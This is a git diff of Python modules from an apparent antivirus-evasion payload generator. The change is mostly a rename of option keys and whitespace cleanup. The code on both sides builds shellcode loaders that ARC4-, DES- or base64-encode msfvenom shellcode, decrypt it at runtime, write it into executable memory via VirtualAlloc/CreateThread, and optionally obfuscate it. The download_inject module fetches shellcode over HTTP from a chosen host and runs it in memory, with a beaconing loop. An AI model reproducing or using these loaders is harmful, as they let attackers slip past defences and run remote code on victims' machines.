                 RandEncShellCodePayload = helpers.randomString()
                 HeapVar = helpers.randomString()
-                
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
-        
+
                 PayloadCode = 'from Crypto.Cipher import ARC4\n'
                 PayloadCode += 'import ctypes as avlol\n'
                 PayloadCode += RandIV + ' = \'' + iv + '\'\n'
@@ -156,8 +158,8 @@ class Payload:
                 PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -166,11 +168,11 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -183,10 +185,10 @@ class Payload:
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
                 HeapVar = helpers.randomString()
-                
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
-        
+
                 PayloadCode = 'from Crypto.Cipher import ARC4\n'
                 PayloadCode += 'import ctypes as avlol\n'
                 PayloadCode += 'from datetime import datetime\n'
@@ -205,19 +207,19 @@ class Payload:
                 PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
 
         else:
-            if self.required_options["expire_payload"][0].lower() == "x":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -230,10 +232,10 @@ class Payload:
                 RandShellcode = helpers.randomString()
                 RandReverseShell = helpers.randomString()
                 RandMemoryShell = helpers.randomString()
-                
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
-        
+
                 PayloadCode = 'from Crypto.Cipher import ARC4\n'
                 PayloadCode += 'from ctypes import *\n'
                 PayloadCode += RandIV + ' = \'' + iv + '\'\n'
@@ -245,20 +247,20 @@ class Payload:
                 PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += RandShellcode + '()'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
-            
+
             else:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -273,10 +275,10 @@ class Payload:
                 RandMemoryShell = helpers.randomString()
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
-                
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
-        
+
                 PayloadCode = 'from Crypto.Cipher import ARC4\n'
                 PayloadCode += 'from ctypes import *\n'
                 PayloadCode += 'from datetime import datetime\n'
@@ -293,7 +295,7 @@ class Payload:
                 PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += '\t' + RandShellcode + '()'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode

--- a/modules/payloads/python/shellcode_inject/base64_substitution.py
+++ b/modules/payloads/python/shellcode_inject/base64_substitution.py
@@ -19,7 +19,7 @@ from modules.common import encryption
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "Base64 encoded shellcode is decoded at runtime and executed in memory"
@@ -29,21 +29,23 @@ class Payload:
 
         self.shellcode = shellcode.Shellcode()
 
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["Virtual", "Virtual, Void, Heap"],
-                                 "expire_payload" : ["X", "Optional: Payloads expire after \"X\" days"]}
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["Virtual", "Virtual, Void, Heap"],
+                                    "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
+                                }
 
     def generate(self):
-        if self.required_options["inject_method"][0].lower() == "virtual":
-            if self.required_options["expire_payload"][0].lower() == "x":
+        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Base64 Encode Shellcode
-                EncodedShellcode = base64.b64encode(Shellcode)    
+                EncodedShellcode = base64.b64encode(Shellcode)
 
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
@@ -51,7 +53,7 @@ class Payload:
                 RandBuf = helpers.randomString()
                 RandHt = helpers.randomString()
                 RandT = helpers.randomString()
-                    
+
                 PayloadCode = 'import ctypes as avlol\n'
                 PayloadCode +=  'import base64\n'
                 PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
@@ -62,7 +64,7 @@ class Payload:
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -70,13 +72,13 @@ class Payload:
             else:
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Base64 Encode Shellcode
-                EncodedShellcode = base64.b64encode(Shellcode)    
+                EncodedShellcode = base64.b64encode(Shellcode)
 
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
@@ -102,12 +104,12 @@ class Payload:
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\t' + 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
-        if self.required_options["inject_method"][0].lower() == "heap":
-            if self.required_options["expire_payload"][0].lower() == "x":
+        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -134,7 +136,7 @@ class Payload:
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -143,7 +145,7 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -177,13 +179,13 @@ class Payload:
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
         else:
-            if self.required_options["expire_payload"][0].lower() == "x":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -205,8 +207,8 @@ class Payload:
                 PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
                 PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += RandShellcode + '()'
-    
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -215,7 +217,7 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -245,7 +247,7 @@ class Payload:
                 PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += '\t' + RandShellcode + '()'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode

--- a/modules/payloads/python/shellcode_inject/des_encrypt.py
+++ b/modules/payloads/python/shellcode_inject/des_encrypt.py
@@ -3,7 +3,7 @@
 This payload has DES encrypted shellcode stored within itself.  At runtime, the executable
 uses the key within the file to decrypt the shellcode, injects it into memory, and executes it.
 
-Great examples and code adapted from 
+Great examples and code adapted from
 http://www.laurentluce.com/posts/python-and-cryptography-with-pycrypto/
 
 
@@ -21,29 +21,31 @@ from modules.common import encryption
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "DES Encrypted shellcode is decrypted at runtime with key in file, injected into memory, and executed"
         self.language = "python"
         self.extension = "py"
         self.rating = "Excellent"
-        
+
         self.shellcode = shellcode.Shellcode()
 
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["Virtual", "Virtual, Void, Heap"],
-                                 "expire_payload" : ["X", "Optional: Payloads expire after \"X\" days"]}
-    
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["Virtual", "Virtual, Void, Heap"],
+                                    "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
+                                }
+
     def generate(self):
-        if self.required_options["inject_method"][0].lower() == "virtual":
-            if self.required_options["expire_payload"][0].lower() == "x":
-        
+        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
+
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -53,7 +55,7 @@ class Payload:
                 RandDESKey = helpers.randomString()
                 RandDESPayload = helpers.randomString()
                 RandEncShellCodePayload = helpers.randomString()
-        
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
 
@@ -70,21 +72,21 @@ class Payload:
                 PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
-        
+
                 return PayloadCode
 
             else:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -96,7 +98,7 @@ class Payload:
                 RandEncShellCodePayload = helpers.randomString()
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
-        
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
 
@@ -118,18 +120,18 @@ class Payload:
                 PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
-        
+
                 return PayloadCode
 
-        if self.required_options["inject_method"][0].lower() == "heap":
-            if self.required_options["expire_payload"][0].lower() == "x":
+        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -140,7 +142,7 @@ class Payload:
                 RandDESPayload = helpers.randomString()
                 RandEncShellCodePayload = helpers.randomString()
                 HeapVar = helpers.randomString()
-        
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
 
@@ -158,21 +160,21 @@ class Payload:
                 PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
-        
+
                 return PayloadCode
 
             else:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -185,7 +187,7 @@ class Payload:
                 HeapVar = helpers.randomString()
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
-        
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
 
@@ -208,18 +210,18 @@ class Payload:
                 PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
-        
+
                 return PayloadCode
 
         else:
-            if self.required_options["expire_payload"][0].lower() == "x":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -232,10 +234,10 @@ class Payload:
                 RandShellcode = helpers.randomString()
                 RandReverseShell = helpers.randomString()
                 RandMemoryShell = helpers.randomString()
-        
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
-                
+
                 # Create Payload File
                 PayloadCode = 'from Crypto.Cipher import DES\n'
                 PayloadCode += 'from ctypes import *\n'
@@ -248,20 +250,20 @@ class Payload:
                 PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += RandShellcode + '()'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
-        
+
                 return PayloadCode
 
             else:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -276,7 +278,7 @@ class Payload:
                 RandMemoryShell = helpers.randomString()
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
-        
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
 
@@ -297,8 +299,8 @@ class Payload:
                 PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += '\t' + RandShellcode + '()'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
-        
+
                 return PayloadCode
 

--- a/modules/payloads/python/shellcode_inject/download_inject.py
+++ b/modules/payloads/python/shellcode_inject/download_inject.py
@@ -11,97 +11,99 @@ from modules.common import helpers
 
 
 class Payload:
-	
-	def __init__(self):
 
-		self.description = "Downloads shellcode over HTTP and executes it in memory"
-		self.language = "python"
-		self.rating = "Excellent"
-		self.extension = "py"
+    def __init__(self):
 
-		self.required_options = { "compile_to_exe"  : ["Y", "Compile to an executable"],
-								  "use_pyherion"    : ["N", "Use the pyherion encrypter"],
-								  "DownloadHost"    : ["", "The host to download the shellcode from"],
-								  "DownloadPort"    : ["80", "The port on the host to download from"],
-								  "DownloadName"    : ["runme.bin", "Name of the file to download"],
-								  "Beacon"          : ["N", "Optional: If the payload should beacon back"],
-								  "BeaconSeconds"   : ["3600", "Optional: Beacon interval"]}
-	
-	def generate(self):
+        self.description = "Downloads shellcode over HTTP and executes it in memory"
+        self.language = "python"
+        self.rating = "Excellent"
+        self.extension = "py"
 
-		imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"
+        self.required_options = {
+                                    "COMPILE_TO_EXE"  : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"    : ["N", "Use the pyherion encrypter"],
+                                    "DOWNLOAD_HOST"   : ["", "The host to download the shellcode from"],
+                                    "DOWNLOAD_PORT"   : ["80", "The port on the host to download from"],
+                                    "DOWNLOAD_NAME"   : ["runme.bin", "Name of the file to download"],
+                                    "BEACON"          : ["N", "Optional: If the payload should beacon back"],
+                                    "BEACON_SECONDS"  : ["3600", "Optional: BEACON interval"]
+                                }
 
-		inject_func = helpers.randomString()
-		getexec_func = helpers.randomString()
-		main_func = helpers.randomString()
-		beaconthr_func = helpers.randomString()
+    def generate(self):
 
-		retry_var = helpers.randomString()
-		if self.required_options["Beacon"][0].lower() == 'n':
-			global_vars = "%s = False" % retry_var
-		elif self.required_options["Beacon"][0].lower() == 'y':
-			global_vars = "%s = True" % retry_var
+        imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"
 
-		interval_var = helpers.randomString()
-		opener_var = helpers.randomString()
+        inject_func = helpers.randomString()
+        getexec_func = helpers.randomString()
+        main_func = helpers.randomString()
+        beaconthr_func = helpers.randomString()
 
-		global_vars += "\n%s = %s" % (interval_var, self.required_options["BeaconSeconds"][0]) 
-		global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)
+        retry_var = helpers.randomString()
+        if self.required_options["BEACON"][0].lower() == 'n':
+            global_vars = "%s = False" % retry_var
+        elif self.required_options["BEACON"][0].lower() == 'y':
+            global_vars = "%s = True" % retry_var
 
-		shellcode_var = helpers.randomString()
-		ptr_var = helpers.randomString()
-		ht_var = helpers.randomString()
-		buff_var = helpers.randomString()
+        interval_var = helpers.randomString()
+        opener_var = helpers.randomString()
 
-		inject = "def %s(%s):" % (inject_func, shellcode_var)
-		inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
-		inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
-		inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
-		inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
-		inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
-		inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var
+        global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0])
+        global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)
 
-		url_var = helpers.randomString()
-		shellcode_var = helpers.randomString()
-		info_var = helpers.randomString()
-		thread_var = helpers.randomString()
-		thread_name = helpers.randomString()
-		thread_name2 = helpers.randomString()
+        shellcode_var = helpers.randomString()
+        ptr_var = helpers.randomString()
+        ht_var = helpers.randomString()
+        buff_var = helpers.randomString()
 
-		getexec = "def %s(%s):" % (getexec_func, url_var)
-		getexec += "\n\ttry:"
-		getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
-		getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
-		getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
-		getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
-		getexec += "\n\texcept Exception:"
-		getexec += "\n\t\tpass\n"
+        inject = "def %s(%s):" % (inject_func, shellcode_var)
+        inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
+        inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
+        inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
+        inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
+        inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
+        inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var
 
-		url_var = helpers.randomString()
+        url_var = helpers.randomString()
+        shellcode_var = helpers.randomString()
+        info_var = helpers.randomString()
+        thread_var = helpers.randomString()
+        thread_name = helpers.randomString()
+        thread_name2 = helpers.randomString()
 
-		beaconthr = "def %s(%s):" % (beaconthr_func, url_var) 
-		beaconthr += "\n\twhile True:"
-		beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
-		beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
-		beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
-		beaconthr += "\n\t\t%s.start()\n" % thread_var
+        getexec = "def %s(%s):" % (getexec_func, url_var)
+        getexec += "\n\ttry:"
+        getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
+        getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
+        getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
+        getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
+        getexec += "\n\texcept Exception:"
+        getexec += "\n\t\tpass\n"
 
-		main = "def %s():" % main_func
-		main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DownloadHost'][0], self.required_options['DownloadPort'][0], self.required_options['DownloadName'][0])
-		main += "\n\tif %s is True:" % retry_var
-		main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
